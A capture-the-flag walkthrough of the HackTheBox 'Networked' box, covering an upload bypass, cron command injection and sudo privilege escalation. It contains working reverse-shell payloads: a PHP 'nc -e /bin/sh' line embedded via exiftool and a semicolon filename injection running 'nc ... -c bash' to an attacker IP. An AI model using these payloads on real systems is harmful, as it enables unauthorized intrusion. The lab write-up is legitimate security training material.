HackTheBox “Networked” Walkthrough
Networked, an easy-level Linux OS machine on HackTheBox, it entailed the exploitation of a susceptible file upload functionality to establish initial entry, followed by the utilization of multiple scripts running as privileged rights on the target which in turn elevated our privileges up to the root level.
Let’s get started! 🚀
Recon & Enumeration
Let’s use nmap to full scan for open ports and services:
Visit the target at port 80.
Check the page source.
It indicates an upload and gallery places. To scan for hidden files or directories, let’s initiate a directory busting with Dirsearch.
Visit upload.php.
It confirms to us that there is a place to upload files, let’s check photos.php.
It shows that it is like a place for the uploaded photos, let’s visit backup directory.
Download and extract the archive file “backup.tar.”
The archive file looks like the source code for the site.
Let’s have a look at the content of upload.php.
└─$ cat upload.php
<?php
require '/var/www/html/lib.php';
define("UPLOAD_DIR", "/var/www/html/uploads/");
if( isset($_POST['submit']) ) {
if (!empty($_FILES["myFile"])) {
$myFile = $_FILES["myFile"];
if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {
echo '<pre>Invalid image file.</pre>';
displayform();
}
if ($myFile["error"] !== UPLOAD_ERR_OK) {
echo "<p>An error occurred.</p>";
displayform();
exit;
}
//$name = $_SERVER['REMOTE_ADDR'].'-'. $myFile["name"];
list ($foo,$ext) = getnameUpload($myFile["name"]);
$validext = array('.jpg', '.png', '.gif', '.jpeg');
$valid = false;
foreach ($validext as $vext) {
if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {
$valid = true;
}
}
if (!($valid)) {
echo "<p>Invalid image file</p>";
displayform();
exit;
}
$name = str_replace('.','_',$_SERVER['REMOTE_ADDR']).'.'.$ext;
$success = move_uploaded_file($myFile["tmp_name"], UPLOAD_DIR . $name);
if (!$success) {
echo "<p>Unable to save file.</p>";
exit;
}
echo "<p>file uploaded, refresh gallery</p>";
// set proper permissions on the new file
chmod(UPLOAD_DIR . $name, 0644);
}
} else {
displayform();
}
?>The upload functionlity at upload.php permits only images with the file extensions ‘.jpg’, ‘.png’, ‘.gif’, ‘.jpeg’, and a size not exceeding 60000 bytes.
I intend to upload the machine card information image after reducing its size to below 60000 bytes, and subsequently injecting a reverse shell payload using “exiftool” and then embedding a php extension.
exiftool -DocumentName='<?php system("nc 10.10.14.8 4343 -e /bin/sh"); ?>' shell.jpg
Next, we start a listener accordingly.
Upload the image shell.php.jpg.
We access photos.php.
Once photos.php is loaded, we can see that we get a connection on our listener.
Let’s have a look around.
Notably, the file “/home/guly/check_attack.php” is executed every 3 minutes according to “crontab.guly.”
Let’s have a look at “/home/guly/check_attack.php”.
sh-4.2$ cat check_attack.php
cat check_attack.php
<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";
$files = array();
$files = preg_grep('/^([^.])/', scandir($path));
foreach ($files as $key => $value) {
$msg='';
if ($value == 'index.html') {
continue;
}
#echo "-------------\n";
#print "check: $value\n";
list ($name,$ext) = getnameCheck($value);
$check = check_ip($name,$value);
if (!($check[0])) {
echo "attack!\n";
# todo: attach file
file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);
exec("rm -f $logpath");
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
echo "rm -f $path$value\n";
mail($to, $msg, $msg, $headers, "-F$value");
}
}
?>The highlighted line: exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); raises immediate concern due to its lack of filtering, making it susceptible to command injection. The variables $path and $value represent the uploads directory path and the potentially malicious file's name, respectively.
By crafting a payload file in the /var/www/html/uploads directory with a name starting with a semicolon (;), we can execute arbitrary commands, including a reverse shell command.
Let’s first start a listener.
We inject the command “; nc 10.10.14.8 4343 -c bash”.
On our listener.
We get a shell as guly user profile.
Let’s list the privileges granted to the user.
Guly can run “/usr/local/sbin/changename.sh” sudoed without a password.
Let’s have a look at “/usr/local/sbin/changename.sh”.
[guly@networked ~]$ ls -lah /usr/local/sbin/changename.sh
ls -lah /usr/local/sbin/changename.sh
-rwxr-xr-x 1 root root 422 Jul 8 2019 /usr/local/sbin/changename.sh
[guly@networked ~]$ cat /usr/local/sbin/changename.sh
cat /usr/local/sbin/changename.sh
#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF
regexp="^[a-zA-Z0-9_\ /-]+$"
for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
echo "interface $var:"
read x
while [[ ! $x =~ $regexp ]]; do
echo "wrong input, try again"
echo "interface $var:"
read x
done
echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done
/sbin/ifup guly0The script enables a network inteface and start asking the user for the name, proxy_method, browser_only, and bootproto of the interface.
As you can find in the link here, A vulnerability impacting the network-scripts service in CentOS allows unauthorized execution of Bash commands as root when spaces are added to certain attributes.
We will run the script and put a phrase followed by bash shell command in an intention to get a root bash shell.
Cheers.
